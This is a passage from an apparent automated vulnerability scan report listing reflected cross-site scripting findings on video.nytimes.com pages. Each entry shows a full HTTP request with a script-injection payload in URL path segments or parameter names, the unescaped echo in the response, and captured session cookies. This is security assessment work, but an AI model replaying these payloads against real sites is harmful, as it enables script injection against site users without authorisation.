Date: Sat, 13 Nov 2010 04:17:34 GMT
Content-type: text/html
Content-Length: 226232

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
nce%20to%20save%20art.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'continuousda116';25c407da1e0' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.330. http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e163c"><script>alert(1)</script>2f5978b7eee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html?e163c"><script>alert(1)</script>2f5978b7eee=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:43 GMT
Content-type: text/html
Content-Length: 226184

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/25/continuous/1248069237870/timescast-october-25-2010.html?e163c"><script>alert(1)</script>2f5978b7eee=1">
...[SNIP]...

3.331. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eca52"><script>alert(1)</script>0db974440ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010eca52"><script>alert(1)</script>0db974440ef/10/28/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:08:44 GMT
Content-type: text/html
Content-Length: 233587

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010eca52"><script>alert(1)</script>0db974440ef/10/28/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.332. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 356dd"><script>alert(1)</script>d86ed30a8bd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10356dd"><script>alert(1)</script>d86ed30a8bd/28/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:10:10 GMT
Content-type: text/html
Content-Length: 233585

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10356dd"><script>alert(1)</script>d86ed30a8bd/28/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.333. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 55ecc"><script>alert(1)</script>dffe271a58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/2855ecc"><script>alert(1)</script>dffe271a58/movies/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:00 GMT
Content-type: text/html
Content-Length: 233583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/2855ecc"><script>alert(1)</script>dffe271a58/movies/1248069253174/creating-monsters.html">
...[SNIP]...

3.334. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9cf6b"%3b620fdd0f823 was submitted in the REST URL parameter 5. This input was echoed as 9cf6b";620fdd0f823 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/28/movies9cf6b"%3b620fdd0f823/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:57 GMT
Content-type: text/html
Content-Length: 96816

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="text/javascript">
var user_type = "0";
var s_prop20 = "";
var s_account = "nytimesglobal,nytmovies9cf6b";620fdd0f823";
var dcsvid = "";
var regstatus = "non-registered";
var s_channel = "movies9cf6b";620fdd0f823";
var s_prop2 = "";
var s_prop1 = "multimedia";
</script>
...[SNIP]...

3.335. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88bbb'%3b302aaaefc81 was submitted in the REST URL parameter 5. This input was echoed as 88bbb';302aaaefc81 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /video/2010/10/28/movies88bbb'%3b302aaaefc81/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:19 GMT
Content-type: text/html
Content-Length: 96834

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
ilm%20on%20his%20computer.');
}
function getShareKeywords() {
return( '' );
}
function getShareSection() {
return( 'Video%20Library' );
}
function getShareSectionDisplay() {
return( 'movies88bbb';302aaaefc81' );
}
function getShareSubSection() {
return( '' );
}
function getShareByline() { //artist is specific to slide - should actually relate to entire show
return getTitleItem('auth', decodeURICom
...[SNIP]...

3.336. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1af26"><script>alert(1)</script>7e0dfea89dd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies1af26"><script>alert(1)</script>7e0dfea89dd/1248069253174/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:11:51 GMT
Content-type: text/html
Content-Length: 96952

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies1af26"><script>alert(1)</script>7e0dfea89dd/1248069253174/creating-monsters.html">
...[SNIP]...

3.337. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db33"><script>alert(1)</script>6a65154c9c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/12480692531743db33"><script>alert(1)</script>6a65154c9c/creating-monsters.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:36 GMT
Content-type: text/html
Content-Length: 233583

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/12480692531743db33"><script>alert(1)</script>6a65154c9c/creating-monsters.html">
...[SNIP]...

3.338. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81c0"><script>alert(1)</script>3f333c67ce5 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/1248069253174/creating-monsters.htmld81c0"><script>alert(1)</script>3f333c67ce5 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:12:58 GMT
Content-type: text/html
Content-Length: 96828

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.htmld81c0"><script>alert(1)</script>3f333c67ce5">
...[SNIP]...

3.339. http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/10/28/movies/1248069253174/creating-monsters.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c25eb"><script>alert(1)</script>feaaed33dee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/10/28/movies/1248069253174/creating-monsters.html?c25eb"><script>alert(1)</script>feaaed33dee=1 HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:06:18 GMT
Content-type: text/html
Content-Length: 96770

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010/10/28/movies/1248069253174/creating-monsters.html?c25eb"><script>alert(1)</script>feaaed33dee=1">
...[SNIP]...

3.340. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0625"><script>alert(1)</script>eed7e47a551 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010e0625"><script>alert(1)</script>eed7e47a551/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:01:24 GMT
Content-type: text/html
Content-Length: 233623

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">

<script type="
...[SNIP]...
<meta name="canonical" href="http://video.nytimes.com/video/2010e0625"><script>alert(1)</script>eed7e47a551/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html">
...[SNIP]...

3.341. http://video.nytimes.com/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://video.nytimes.com
Path:	/video/2010/11/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ad6f"><script>alert(1)</script>1ea5dd66c51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /video/2010/117ad6f"><script>alert(1)</script>1ea5dd66c51/05/business/1248069286134/citigroup-prevails-in-emi-lawsuit.html HTTP/1.1
Host: video.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; tmq=kvq%3DD%3Bkvq%3DT; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; ups=ABD1gU1d20SA06nv;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 04:03:25 GMT
Content-type: text/html
Content-Length: 233623

